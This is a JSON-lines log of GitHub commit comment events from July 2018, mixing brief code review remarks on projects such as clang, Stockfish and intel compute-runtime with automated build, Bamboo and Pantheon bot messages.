{"id":"8045828482","type":"CommitCommentEvent","actor":{"login":"thinkseven"},"repo":{"name":"thinkseven/reactnd-redux-todos-goals"},"payload":{"comment":{"id":29909106,"position":null,"line":null,"path":null,"commit_id":"12a8de9199b9cd12e712c53e335279ece670edb1","created_at":"2018-07-31T18:19:43Z","updated_at":"2018-07-31T18:19:43Z","author_association":"OWNER","body":"Implement Redux Library\r\nhttps://cdnjs.cloudflare.com/ajax/libs/redux/3.7.2/redux.js"}},"created_at":"2018-07-31T18:19:43Z"}
{"id":"8045830597","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29909115,"position":null,"line":null,"path":null,"commit_id":"3e972f46556ff2ace57c4584d01827aa3b61f826","created_at":"2018-07-31T18:20:06Z","updated_at":"2018-07-31T18:20:06Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2959 of 2959 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T18:20:06Z"}
{"id":"8045830773","type":"CommitCommentEvent","actor":{"login":"burtonr"},"repo":{"name":"burtonr/templates"},"payload":{"comment":{"id":29909116,"position":2,"line":2,"path":"verify.sh","commit_id":"a1dc9ac19cc689eeb0c7070aeb559e4d6122ca9a","created_at":"2018-07-31T18:20:08Z","updated_at":"2018-07-31T18:20:08Z","author_association":"OWNER","body":"Great suggestion! I have done that in my locally modified version. I'm still playing around with some other options before committing an updated version.\r\n\r\nBut, this is a great suggestion and does work well!"}},"created_at":"2018-07-31T18:20:08Z"}
{"id":"8045832478","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29909122,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T18:20:27Z","updated_at":"2018-07-31T18:20:27Z","author_association":"COLLABORATOR","body":"So I got rid of the warnings, but now I'm running into another issue. For some reason, `noblacklist` doesn't seem to understand the variables, while `blacklist`, `read-only`, etc all do."}},"created_at":"2018-07-31T18:20:27Z"}
{"id":"8045832699","type":"CommitCommentEvent","actor":{"login":"amendelzon"},"repo":{"name":"rsksmart/RSKIPs"},"payload":{"comment":{"id":29909123,"position":66,"line":66,"path":"IPs/RSKIP87.md","commit_id":"a4ae1a41abb432c665f5ada46e93fa7a34e6bc82","created_at":"2018-07-31T18:20:30Z","updated_at":"2018-07-31T18:20:30Z","author_association":"NONE","body":"\"soon to be added\" => \"proposed\""}},"created_at":"2018-07-31T18:20:30Z"}
{"id":"8045854885","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909201,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-31T18:24:35Z","updated_at":"2018-07-31T18:24:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:24:35Z"}
{"id":"8045855649","type":"CommitCommentEvent","actor":{"login":"athoik"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":29909203,"position":null,"line":null,"path":null,"commit_id":"c4e987169c49176b6e9127609e004e57f3a6bcc4","created_at":"2018-07-31T18:24:45Z","updated_at":"2018-07-31T18:24:45Z","author_association":"CONTRIBUTOR","body":"I am not sure, is there a known TP with Input Stream ID = 0?\r\n\r\nAlso 0 is not showing on info, give a try!"}},"created_at":"2018-07-31T18:24:45Z"}
{"id":"8045856002","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29909204,"position":131,"line":131,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T18:24:48Z","updated_at":"2018-07-31T18:24:48Z","author_association":"OWNER","body":"True. If you agree, I will focus on functional changes first."}},"created_at":"2018-07-31T18:24:48Z"}
{"id":"8045856161","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29909205,"position":47,"line":44,"path":"Lesson3/train.rb","commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T18:24:50Z","updated_at":"2018-07-31T18:24:50Z","author_association":"NONE","body":"обычно рекомендую использовать `if`, вместо `unless`\r\n\"иф стейтменты\" легче читаются\r\nздесь можно написать `if @current_index > 0`"}},"created_at":"2018-07-31T18:24:50Z"}
{"id":"8045858113","type":"CommitCommentEvent","actor":{"login":"zer0byte"},"repo":{"name":"mikaelkall/OSCP-cheat-sheet"},"payload":{"comment":{"id":29909206,"position":null,"line":null,"path":null,"commit_id":"1bcab5d283e459d1fb36d102a6fa56eef755f12e","created_at":"2018-07-31T18:25:13Z","updated_at":"2018-07-31T18:25:13Z","author_association":"NONE","body":"Xxe*"}},"created_at":"2018-07-31T18:25:13Z"}
{"id":"8045858127","type":"CommitCommentEvent","actor":{"login":"cburgdorf"},"repo":{"name":"cburgdorf/py-evm"},"payload":{"comment":{"id":29909207,"position":35,"line":209,"path":"eth/vm/logic/arithmetic.py","commit_id":"fc3db77c1a9872b744febc731b8768ec2a5a5a3e","created_at":"2018-07-31T18:25:13Z","updated_at":"2018-07-31T18:25:13Z","author_association":"OWNER","body":"Same here, means we are doing the (supposed to be) more costly division instead of actual bit shifting "}},"created_at":"2018-07-31T18:25:13Z"}
{"id":"8045859301","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909209,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-31T18:25:26Z","updated_at":"2018-07-31T18:25:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:25:26Z"}
{"id":"8045860905","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29909213,"position":null,"line":null,"path":null,"commit_id":"0e45073ce805127a0caf834ef825ad0107b661a1","created_at":"2018-07-31T18:25:44Z","updated_at":"2018-07-31T18:25:44Z","author_association":"OWNER","body":"@snicolet Isn't it a parameter tweak and a trivial change? I modify one constant Score and replace one already-defined variable with another, so I don't think the code complexity increases or decreases.  Are you suggesting [0, 5] or [-3, 1]?"}},"created_at":"2018-07-31T18:25:44Z"}
{"id":"8045860992","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909215,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-31T18:25:45Z","updated_at":"2018-07-31T18:25:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:25:45Z"}
{"id":"8045862521","type":"CommitCommentEvent","actor":{"login":"ewilde"},"repo":{"name":"burtonr/templates"},"payload":{"comment":{"id":29909224,"position":15,"line":15,"path":"verify.sh","commit_id":"a1dc9ac19cc689eeb0c7070aeb559e4d6122ca9a","created_at":"2018-07-31T18:26:02Z","updated_at":"2018-07-31T18:26:02Z","author_association":"NONE","body":"@burtonr out of interest why does an empty output indicate success, I confess I don't know much about the template images\r\n\r\nOn the faas `ci.sh` I used curl and the http status code to indicate when something was successfully up and running\r\n\r\nhttps://github.com/openfaas/faas/blob/c2672790a72263308b68c0856c7e980c11afa98f/contrib/ci.sh#L10"}},"created_at":"2018-07-31T18:26:02Z"}
{"id":"8045863200","type":"CommitCommentEvent","actor":{"login":"hootlex"},"repo":{"name":"vueschool/vuejs-firebase-authentication"},"payload":{"comment":{"id":29909229,"position":null,"line":null,"path":null,"commit_id":"c79e9846b620b12cc08bfc2d7093b76703a7b7f3","created_at":"2018-07-31T18:26:09Z","updated_at":"2018-07-31T18:26:09Z","author_association":"MEMBER","body":"@Daltimore nice catch! Want to submit a PR?"}},"created_at":"2018-07-31T18:26:09Z"}
{"id":"8045865252","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29909231,"position":157,"line":157,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T18:26:31Z","updated_at":"2018-07-31T18:26:31Z","author_association":"OWNER","body":"I see, didn't realize that. Thanks!"}},"created_at":"2018-07-31T18:26:31Z"}
{"id":"8045865808","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909232,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-31T18:26:37Z","updated_at":"2018-07-31T18:26:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:26:37Z"}
{"id":"8045867769","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909235,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-31T18:26:57Z","updated_at":"2018-07-31T18:26:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:26:57Z"}
{"id":"8045869539","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29909237,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-31T18:27:17Z","updated_at":"2018-07-31T18:27:17Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-31T18:27:17Z"}
{"id":"8045869945","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29909242,"position":null,"line":null,"path":null,"commit_id":"c582ce55d6c1185a60f4b0fc2eb8882f1aa9acb4","created_at":"2018-07-31T18:27:22Z","updated_at":"2018-07-31T18:27:22Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#ci-13](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#ci-13).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-13-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T18:27:22Z"}
{"id":"8045870005","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29909243,"position":null,"line":null,"path":null,"commit_id":"d9bd035a9bafa23568ea009893606e2398d292db","created_at":"2018-07-31T18:27:23Z","updated_at":"2018-07-31T18:27:23Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-587](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-587).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-587-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T18:27:23Z"}
{"id":"8045870241","type":"CommitCommentEvent","actor":{"login":"MichalMrozek"},"repo":{"name":"intel/compute-runtime"},"payload":{"comment":{"id":29909244,"position":20,"line":185,"path":"runtime/context/context.cpp","commit_id":"d53e1c3979f6d822f55645bfcd753be1658f53ca","created_at":"2018-07-31T18:27:25Z","updated_at":"2018-07-31T18:27:25Z","author_association":"CONTRIBUTOR","body":"That's the goal of this change, to have max power saving mode when VA sharing is used.\r\nFor other use cases we have mixed mode in place with configurable timers.\r\nPlease bear in mind that there is no gold setting that works for all applications on the market."}},"created_at":"2018-07-31T18:27:25Z"}
{"id":"8045872416","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909250,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-31T18:27:50Z","updated_at":"2018-07-31T18:27:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:27:50Z"}
{"id":"8045873505","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29909253,"position":168,"line":168,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T18:28:02Z","updated_at":"2018-07-31T18:28:02Z","author_association":"OWNER","body":"This is the first point where we know that ``T* is a `CXXRecordDecl`. Do you think we will have those attributes on other Decls as well?"}},"created_at":"2018-07-31T18:28:02Z"}
{"id":"8045874317","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909256,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-31T18:28:11Z","updated_at":"2018-07-31T18:28:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:28:11Z"}
{"id":"8045874868","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29909260,"position":187,"line":187,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T18:28:16Z","updated_at":"2018-07-31T18:28:16Z","author_association":"OWNER","body":"Fixed"}},"created_at":"2018-07-31T18:28:16Z"}
{"id":"8045875981","type":"CommitCommentEvent","actor":{"login":"burtonr"},"repo":{"name":"burtonr/templates"},"payload":{"comment":{"id":29909265,"position":15,"line":15,"path":"verify.sh","commit_id":"a1dc9ac19cc689eeb0c7070aeb559e4d6122ca9a","created_at":"2018-07-31T18:28:30Z","updated_at":"2018-07-31T18:28:30Z","author_association":"OWNER","body":"Actually, the opposite. `! -z` if the output is _not_ empty it is a success. \r\n\r\nI'd really like to be a little more specific here, but that would require modifying nearly all of the templates in order to get a standardized output from each of them. That could be a change for a future PR. This is a good start though. More or less being sure that the template is able to build, run, and return something."}},"created_at":"2018-07-31T18:28:30Z"}
{"id":"8045878577","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909272,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-31T18:29:00Z","updated_at":"2018-07-31T18:29:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:29:00Z"}
{"id":"8045880521","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909276,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-31T18:29:22Z","updated_at":"2018-07-31T18:29:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:29:22Z"}
{"id":"8045882326","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29909278,"position":196,"line":196,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T18:29:44Z","updated_at":"2018-07-31T18:29:44Z","author_association":"OWNER","body":"Moved up. I guess the order is especially important for satisfiesRangeConcept and satisfiesContainerRequirements, because every container is also a range (?)"}},"created_at":"2018-07-31T18:29:44Z"}
{"id":"8045883104","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29909280,"position":43,"line":420,"path":"source/gameengine/Ketsji/KX_Mesh.cpp","commit_id":"59d33db590c41d98e8b04d17c80d2f3e355d8d62","created_at":"2018-07-31T18:29:52Z","updated_at":"2018-07-31T18:29:52Z","author_association":"CONTRIBUTOR","body":"@joelgomes1994 What is your OS and compiler version ? This macro is used in the blender code too."}},"created_at":"2018-07-31T18:29:52Z"}
{"id":"8045884033","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29909285,"position":null,"line":null,"path":null,"commit_id":"d98537fce2a00d98c4ae0532868dff348c24918e","created_at":"2018-07-31T18:30:03Z","updated_at":"2018-07-31T18:30:03Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-59](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-59).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-59-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-31T18:30:03Z"}
{"id":"8045885586","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909291,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-31T18:30:20Z","updated_at":"2018-07-31T18:30:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:30:20Z"}
{"id":"8045886439","type":"CommitCommentEvent","actor":{"login":"MichalMrozek"},"repo":{"name":"intel/compute-runtime"},"payload":{"comment":{"id":29909293,"position":6,"line":41,"path":"runtime/helpers/kmd_notify_properties.cpp","commit_id":"d53e1c3979f6d822f55645bfcd753be1658f53ca","created_at":"2018-07-31T18:30:30Z","updated_at":"2018-07-31T18:30:30Z","author_association":"CONTRIBUTOR","body":"This is due to the fact that we need different timeouts in various conditions, like what API is calling wait function, or what is the frequency of wait calls, different operating systems with different latency profiles, etc.\r\n\r\nI would gladly always use bo_wait ioctl, but it has big overhead for short workloads."}},"created_at":"2018-07-31T18:30:30Z"}
{"id":"8045886734","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909294,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-31T18:30:33Z","updated_at":"2018-07-31T18:30:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:30:33Z"}
{"id":"8045889070","type":"CommitCommentEvent","actor":{"login":"trxsha"},"repo":{"name":"trxsha/Space-Invaders"},"payload":{"comment":{"id":29909305,"position":null,"line":null,"path":null,"commit_id":"22ede5e0f3cd3e74ab943d28af55fc30c30c313b","created_at":"2018-07-31T18:30:59Z","updated_at":"2018-07-31T18:30:59Z","author_association":"OWNER","body":"A gif of the game stages "}},"created_at":"2018-07-31T18:30:59Z"}
{"id":"8045889919","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29909308,"position":222,"line":222,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T18:31:09Z","updated_at":"2018-07-31T18:31:09Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-31T18:31:09Z"}
{"id":"8045891909","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909314,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-31T18:31:30Z","updated_at":"2018-07-31T18:31:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:31:30Z"}
{"id":"8045892767","type":"CommitCommentEvent","actor":{"login":"martinayotte"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29909319,"position":null,"line":null,"path":null,"commit_id":"7e6277ca3ba602eb5a07735b78f11b85a68177e5","created_at":"2018-07-31T18:31:40Z","updated_at":"2018-07-31T18:31:40Z","author_association":"CONTRIBUTOR","body":"A small issue have been introduced during all merges/moves of sunxi-next/sunxi-dev\r\n\r\nThe file https://github.com/armbian/build/blob/master/patch/kernel/sunxi-next/board-pine64-add-spi-flash.patch doesn't show history but searching for it it bring me to this previous location with this commit on May 24 2c08ec8, still no history there, but searching more revealed me that it is a copy of this previous patch which were disabled https://github.com/armbian/build/blob/master/patch/kernel/sunxi64-dev/add-mtd-spi-nor-dts.patch.disabled back in Sept 16.\r\n\r\nThe issue is that the kernel, not u-boot, try to mount this spi-flash in early boot and crash for some reason. (I can provide log later if 